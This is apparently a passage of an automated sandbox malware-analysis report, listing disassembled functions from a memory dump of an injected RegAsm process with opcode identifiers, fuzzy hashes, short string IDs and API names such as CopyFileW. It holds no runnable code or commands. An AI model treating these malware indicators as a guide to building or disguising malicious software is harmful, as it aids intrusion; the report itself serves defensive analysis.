                                                                          • Instruction Fuzzy Hash: 37F1E134204741CFE7258F29D891BB3BBA2FB5A301F1945ADD5D68B392C739E881CB58
                                                                          Function 004266E7 Relevance: 1.7, Strings: 1, Instructions: 424COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: &tB
                                                                          • API String ID: 0-268467982
                                                                          • Opcode ID: ab8b9b4babc4c53dd273e945744bbaef1afa28ee0cdd2d4e334d85f9a15f2521
                                                                          • Instruction ID: 06a34f82c29db43340e48ad1cbe7e395302b1ddd3c50ea808075b5b9ec83bf05
                                                                          • Opcode Fuzzy Hash: ab8b9b4babc4c53dd273e945744bbaef1afa28ee0cdd2d4e334d85f9a15f2521
                                                                          • Instruction Fuzzy Hash: C5E169B5A083618FC7109F14E45136BB7E1AFDA304F0A486EE8C597342D639ED45CB9B
                                                                          Function 0042A630 Relevance: 1.6, Strings: 1, Instructions: 396COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: "
                                                                          • API String ID: 0-123907689
                                                                          • Opcode ID: 4abfa2479a0e4305d02d5d5ee4678300abeb872efe24ce69da09627c08f165b8
                                                                          • Instruction ID: f813c1fc85afd7223dda0e36a8c027de47e21e6ca96e88e37e758e8b14c45e64
                                                                          • Opcode Fuzzy Hash: 4abfa2479a0e4305d02d5d5ee4678300abeb872efe24ce69da09627c08f165b8
                                                                          • Instruction Fuzzy Hash: 03C113B2B043215BD7149E25E44076BB7E5AF84310F59892FEC9687382E738DC59C78B
                                                                          Function 00417190 Relevance: 1.6, Strings: 1, Instructions: 375COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RuA
                                                                          • API String ID: 0-3286949753
                                                                          • Opcode ID: d354970e6102b2f6e14b23a1e4f96fce490ba8160eb9c464f18d88e9fbdd3b3e
                                                                          • Instruction ID: 812d55878a62f6fab66defe66c88ae53172d99736bf38563795d352ae53827f1
                                                                          • Opcode Fuzzy Hash: d354970e6102b2f6e14b23a1e4f96fce490ba8160eb9c464f18d88e9fbdd3b3e
                                                                          • Instruction Fuzzy Hash: 8CB10234208701CFE7258F29D851B73B7F2EB4A711F1489ADD4968B392D738A882CB58
                                                                          Function 00421EE0 Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x%
                                                                          • API String ID: 0-3980080454
                                                                          • Opcode ID: 21b534372c422996cba93c7f3a0046e52d28a6e1f65226b4000f06bfaeed42f9
                                                                          • Instruction ID: 53925fe815e81de9676dfe4c3668865c11de61aed011eb2c10e86570e61a59d5
                                                                          • Opcode Fuzzy Hash: 21b534372c422996cba93c7f3a0046e52d28a6e1f65226b4000f06bfaeed42f9
                                                                          • Instruction Fuzzy Hash: 7BA145B1604320ABCB10DF24DC91B6777E4FF94358F08492DEA858B391E7B9E905C766
                                                                          Function 0042AAD0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: "
                                                                          • API String ID: 0-123907689
                                                                          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                          • Instruction ID: 1b0d155936ea343f35509df964668f6b6c6c9246b28269455b7de3af52c0cfb1
                                                                          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                          • Instruction Fuzzy Hash: D271E632B183254BD714CE28E58031BBBE3ABC5710F99856EE9949B391D238EC55C78B
                                                                          Function 00425F7D Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 1_B
                                                                          • API String ID: 0-2132359058
                                                                          • Opcode ID: ebd4713a8c839dd888d4ddf57068d90824b288b6a5d2fb2c475a76c4d08f8f2d
                                                                          • Instruction ID: 5b09de0f708086b2db089408e795921656c95d083517461b5049a84f32a7c51a
                                                                          • Opcode Fuzzy Hash: ebd4713a8c839dd888d4ddf57068d90824b288b6a5d2fb2c475a76c4d08f8f2d
                                                                          • Instruction Fuzzy Hash: D8415972D09B7487C230DA64A81017BB6D5DB85310F9A847FF9C697342EB38AD01A7CA
                                                                          Function 0042B4BB Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CUUI
                                                                          • API String ID: 0-173970609
                                                                          • Opcode ID: 11d751ef2c6838004d4261e70f5839909a1e0ffe6a220f83fd188cfbbc9468dc
                                                                          • Instruction ID: 633f9cfe08b78efd1148aada0c0c4a0bea52aba14bf5254293374e99ea80dff2
                                                                          • Opcode Fuzzy Hash: 11d751ef2c6838004d4261e70f5839909a1e0ffe6a220f83fd188cfbbc9468dc
                                                                          • Instruction Fuzzy Hash: 9541E7A020C7E08ADB358F2594903ABBBE1DFD3304F5884ADC6C56B243C77988068B5A
                                                                          Function 00425230 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: cba`
                                                                          • API String ID: 2994545307-1926275841
                                                                          • Opcode ID: e363ae243e25186fafc727a7c143fe84283cddf713b74be5aabea9aa04b6da8b
                                                                          • Instruction ID: beb69707a00ddb1e0f288a180930159145dfafadf277c1aff9f3426dfcb85bde
                                                                          • Opcode Fuzzy Hash: e363ae243e25186fafc727a7c143fe84283cddf713b74be5aabea9aa04b6da8b
                                                                          • Instruction Fuzzy Hash: 47113536A44B204BC324CE289DC163777E1AB95314F95263DDCA9D33A1E278EC009AD9
                                                                          Function 00407470 Relevance: .6, Instructions: 625COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b4f2b084faef48d893cec2519f241ff843f37aefc35a02b9a69ce986de1685e5
                                                                          • Instruction ID: af49202ca076376fa415bca2a3091a328854806cafe53c7e33487b358e5641c5
                                                                          • Opcode Fuzzy Hash: b4f2b084faef48d893cec2519f241ff843f37aefc35a02b9a69ce986de1685e5
                                                                          • Instruction Fuzzy Hash: 9722B332A087118BD725DF18D9806ABB3E1BFC4319F19893ED986A7385D738B851CB47
                                                                          Function 0043CAC0 Relevance: .5, Instructions: 548COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 86b120d65a92fc5bdbbef3624e805ea907a676f62533a2aebf6e078355a3b7f7
                                                                          • Instruction ID: a0fb517757f1b8da7777bae7579d9f52a382c29ac2183c4fd28747a7d9f1db1e
                                                                          • Opcode Fuzzy Hash: 86b120d65a92fc5bdbbef3624e805ea907a676f62533a2aebf6e078355a3b7f7
                                                                          • Instruction Fuzzy Hash: F402127AB04216CFC704CF28E8906AAB7F2FB8A311F1A847ED58593351D734AD55CB86
                                                                          Function 0043CBD6 Relevance: .5, Instructions: 461COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d076b9d010211f014a59fe34b7121c93ea0654b322b9de3976980b709a020c0e
                                                                          • Instruction ID: 0188f3e029ce03e8205a7a452b25b6dbd5bcd661a0513372e50984eaaf58ab41
                                                                          • Opcode Fuzzy Hash: d076b9d010211f014a59fe34b7121c93ea0654b322b9de3976980b709a020c0e
                                                                          • Instruction Fuzzy Hash: 98E12F79B04216CFC704CF68E8906AAB7F2FB8A312F1A847EE585D3351D334A955CB85
                                                                          Function 00405910 Relevance: .4, Instructions: 449COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 72ef3389d17b5c2d7356fca882b754ee43f181ee348d4ceda7fd19fbe0bcaa8a
                                                                          • Instruction ID: 292f23283d7cd07bb6fd19c8603031892cd16be448e450c68c3e166b8ce1a4f1
                                                                          • Opcode Fuzzy Hash: 72ef3389d17b5c2d7356fca882b754ee43f181ee348d4ceda7fd19fbe0bcaa8a
                                                                          • Instruction Fuzzy Hash: DAF1CF356087418FD724CF29C88066BFBE2EFD9304F08882EE5D597791E679E904CB5A
                                                                          Function 0043CCE0 Relevance: .4, Instructions: 394COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 536c392115e0cff150cd0d6d8dc87b4614f7e511d1c43d6d4655b511f952909a
                                                                          • Instruction ID: b7c2eaf3338182462aad9b41d84ad1057b9f4e6ab3b7739cdaab2d2094e4d2b6
                                                                          • Opcode Fuzzy Hash: 536c392115e0cff150cd0d6d8dc87b4614f7e511d1c43d6d4655b511f952909a
                                                                          • Instruction Fuzzy Hash: 36C1007AA04216CFC704CF28E8906AAB7F2FB8A311F1A447DE98593351D734ED54CB85
                                                                          Function 004286F0 Relevance: .4, Instructions: 392COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0698e5323aca3189bcf61449c470d5166dbf916172f2457ca70a618e1c4aeee2
                                                                          • Instruction ID: 56b07d3b8ecf2697cfceb0b79347f06369642de1c8fee68a0e9743baf01ab03d
                                                                          • Opcode Fuzzy Hash: 0698e5323aca3189bcf61449c470d5166dbf916172f2457ca70a618e1c4aeee2
                                                                          • Instruction Fuzzy Hash: 46C12EB060D3218AC314DF14D86272BB7F2EF92364F44891DF0D19B395EB789905CB9A
                                                                          Function 0043CD60 Relevance: .4, Instructions: 355COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b7ae3e85a33d43a6e2771b0fd908fe387ca734c2f104cbcf9b416a7aefdf7c9a
                                                                          • Instruction ID: 20c8691d40d2db25294344e9a87d3a2a4619c2758e90d916e0ff6e9b3fbd9dce
                                                                          • Opcode Fuzzy Hash: b7ae3e85a33d43a6e2771b0fd908fe387ca734c2f104cbcf9b416a7aefdf7c9a
                                                                          • Instruction Fuzzy Hash: 95B1FE7AA14216CFC704CF68E8906AAB7F1FB8A311F1A447EE98693350D734ED54CB85
                                                                          Function 0043CE00 Relevance: .3, Instructions: 332COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fc05906a2cd7047f79f16b5ec2f82067cc14c0beb5821a18253c96a7a105a64b
                                                                          • Instruction ID: 02c91c5c175dbfc798e5ae80a92b3f6d79b9f3e28c5cee1d4de64ad44bd3bbdb
                                                                          • Opcode Fuzzy Hash: fc05906a2cd7047f79f16b5ec2f82067cc14c0beb5821a18253c96a7a105a64b
                                                                          • Instruction Fuzzy Hash: 28B1FE79A08216CFC704CF28E8906AAB7F1FB8A311F1A487DE985D3350D734E955CB95
                                                                          Function 00416E97 Relevance: .3, Instructions: 316COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 71e2b72de9db90adf160ba091cc0f4e0f3ea60225d0eeabf88c335e2ed5b0d7e
                                                                          • Instruction ID: 5a7d6a52498181c9cf4f87941996139a214d8b31775e9e11dc627d5a44ad725e
                                                                          • Opcode Fuzzy Hash: 71e2b72de9db90adf160ba091cc0f4e0f3ea60225d0eeabf88c335e2ed5b0d7e
                                                                          • Instruction Fuzzy Hash: 73A143B46047418FD724CF29C8D1B63B7E2AB5A304F14892ED59A87792D338E886CB58
                                                                          Function 0043DFB0 Relevance: .3, Instructions: 274COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: b7535c463ae1e5bcf3702ce14ffd2b5f638eb3eed67e07491a9c0359b24ec7dd
                                                                          • Instruction ID: 9eaef7f6449a926bdd011e6bf6c7dc343cb48eef6fbbacc1f9e318c96c7b604e
                                                                          • Opcode Fuzzy Hash: b7535c463ae1e5bcf3702ce14ffd2b5f638eb3eed67e07491a9c0359b24ec7dd
                                                                          • Instruction Fuzzy Hash: 6891DF356053118BC718DF1AC890A2BB3F6EF9D710F19996DE8858B391E734EC01CB86
                                                                          Function 00428F5D Relevance: .3, Instructions: 257COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 485f9e8018368faea3edae90e71b0f5b01441832ec9af48811220032a096e4bd
                                                                          • Instruction ID: 0033b059549c864885c35c4736f174911fb7ab2e2a7e13fdb612373215023671
                                                                          • Opcode Fuzzy Hash: 485f9e8018368faea3edae90e71b0f5b01441832ec9af48811220032a096e4bd
                                                                          • Instruction Fuzzy Hash: 939168B2A083558FC714CF25945226FF7A2AFD1304F98892EE4E687382D639DD05CB4A
                                                                          Function 0041CEA5 Relevance: .2, Instructions: 188COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7d03f9876956ffac6f74f0866a7bde9a035be760a6bedc0074a97e3c21121794
                                                                          • Instruction ID: 79a636d4ef35a115cd61f203c964b336e8654c9833e22f85933b964d871e8aad
                                                                          • Opcode Fuzzy Hash: 7d03f9876956ffac6f74f0866a7bde9a035be760a6bedc0074a97e3c21121794
                                                                          • Instruction Fuzzy Hash: 824113B455835287CB209F289C413BBF3F1AFA2358F59455EE8C597380E738D992C36A
                                                                          Function 00427307 Relevance: .2, Instructions: 174COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4c7e07812f1b8347d7007c075ffe03fcbbfb4954c80059fd09941d44e601273e
                                                                          • Instruction ID: cd3817f91458a04e6f4698fbdec964a5fe2b941d70aabd782eb82a79c60357af
                                                                          • Opcode Fuzzy Hash: 4c7e07812f1b8347d7007c075ffe03fcbbfb4954c80059fd09941d44e601273e
                                                                          • Instruction Fuzzy Hash: 4751EBB060C3208AC720DF60E49132BB7F0EFA2344F40492DD9D64B761EB799908DB9B
                                                                          Function 004292D0 Relevance: .1, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 54105d90293e4b8a7fe8cebbefda0a172f6c9cbfe66afa0c85e262d0473a1c3c
                                                                          • Instruction ID: 8a214a05a26fc8f928125f8fb48cb90f3e515442b7647201508495c5dbe42c78
                                                                          • Opcode Fuzzy Hash: 54105d90293e4b8a7fe8cebbefda0a172f6c9cbfe66afa0c85e262d0473a1c3c
                                                                          • Instruction Fuzzy Hash: DA4127B2B193504BD71CCF258CA275FFBA2EBC5308F16883DE5869B284CA7494078B45
                                                                          Function 00436B20 Relevance: .1, Instructions: 116COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 91220374a97f5aff33aa7e71888e41c88829f78e25f822e198eb2ef461918297
                                                                          • Instruction ID: 504e49b0b2ddc2a099550f91d12c5185d5b4ceea0bdb26274afb8cde00bc0dbb
                                                                          • Opcode Fuzzy Hash: 91220374a97f5aff33aa7e71888e41c88829f78e25f822e198eb2ef461918297
                                                                          • Instruction Fuzzy Hash: B5314632A083385B83249E5D8982067F7E8EBCD714F1AE12FD884E7311E574ED0147C5
                                                                          Function 0041597D Relevance: .1, Instructions: 64COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 73dc7dffa9da4718634bc1df2c87a66b7a70c35b3b00ffd698cd8eaa02142161
                                                                          • Instruction ID: d5ab4806ffe72a1369b891b0c03ce99b48dccca7df38fd9f7e726c1ee5c76a78
                                                                          • Opcode Fuzzy Hash: 73dc7dffa9da4718634bc1df2c87a66b7a70c35b3b00ffd698cd8eaa02142161
                                                                          • Instruction Fuzzy Hash: 250124347A0A01DBE7258B15A891BB37293FB82310FA49029E18293281DB69AC91875D
                                                                          Function 004345F0 Relevance: .1, Instructions: 64COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                          • Instruction ID: fc3937f92bddd9b9036211213233e27d23e83f380f16c5f831fb688d5273015d
                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                          • Instruction Fuzzy Hash: 8E11EC336051D40EC3158D3C84005A5BF930AD7234F59939AF4B4972E6D62A9D8B8359
                                                                          Function 0042A060 Relevance: .1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a62376ffa6d90c1baa96e3dbf302ab3dfe7742f197fede568b4cb05d9ce342f2
                                                                          • Instruction ID: 81ebb7552e56e7d5adf40a514b1d7c04d719dbb311c9cbdb1d4034df3b6f2776
                                                                          • Opcode Fuzzy Hash: a62376ffa6d90c1baa96e3dbf302ab3dfe7742f197fede568b4cb05d9ce342f2
                                                                          • Instruction Fuzzy Hash: D601D4F5B00B1147D7309E11A5C0B27B2A9AF8070CF59443EED4467342DB7EEC28C69A
                                                                          Function 00402B70 Relevance: .0, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dabecf6e6ddfb1cdd8269c5c9ebdc2cc04a1f760bd0808b9cf36547e64e5e14a
                                                                          • Instruction ID: dad6f7438d27f99e102fe50886f5565f1d4720bfb2582f27d129ae765fd9d515
                                                                          • Opcode Fuzzy Hash: dabecf6e6ddfb1cdd8269c5c9ebdc2cc04a1f760bd0808b9cf36547e64e5e14a
                                                                          • Instruction Fuzzy Hash: EEF0E937B1551607A214DD26ACC453BB366D7C6314B295439E841E3281C979F80692B8
                                                                          Function 0042B475 Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 676c11319c11e30e550c5dd480f93aa2d5812f95884204bdcd3370e1ab4f8030
                                                                          • Instruction ID: c74ae76d4aeefb6f888da0d67bba939e79ddb671e6929748130615be24dd088f
                                                                          • Opcode Fuzzy Hash: 676c11319c11e30e550c5dd480f93aa2d5812f95884204bdcd3370e1ab4f8030
                                                                          • Instruction Fuzzy Hash: E6D022789048005BC608EB10EE12639B2688F4B2AEF00303DE443FF353CE38EC60890E
                                                                          Function 0040C274 Relevance: .0, Instructions: 13COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 32957ae45f5fb5a31ef22e0da77331464b0a71ff3474b199ef627a84159dc668
                                                                          • Instruction ID: 52fe0259059b82c7cb9fb3d0f913ef24527c2e8030ec2916e1bb67edfa7a0227
                                                                          • Opcode Fuzzy Hash: 32957ae45f5fb5a31ef22e0da77331464b0a71ff3474b199ef627a84159dc668
                                                                          • Instruction Fuzzy Hash: 01D0122494A2994AD3068F389CA1731BBB1EF03100F442558D142DB291C7D09016865C
                                                                          Function 00427546 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 72fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CopyFileW.KERNEL32(00000000,?,00000000), ref: 00427607
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: CopyFile
                                                                          • String ID: <vB$B\$JC$OR
                                                                          • API String ID: 1304948518-1094185596
                                                                          • Opcode ID: 534c61a23f16c94dd70e9183f09d5d618cb95d249a0f73e85ffe0a6b27bbc1d3
                                                                          • Instruction ID: 8ef9865115e3bd1ef4dc2c2120f56385b28599b8e62f1996c0c1473ca8bdbd32
                                                                          • Opcode Fuzzy Hash: 534c61a23f16c94dd70e9183f09d5d618cb95d249a0f73e85ffe0a6b27bbc1d3
                                                                          • Instruction Fuzzy Hash: 802180B964D340DFD3209F61A84671BBBF4FB86304F40582CE1D587291EB788515DB4A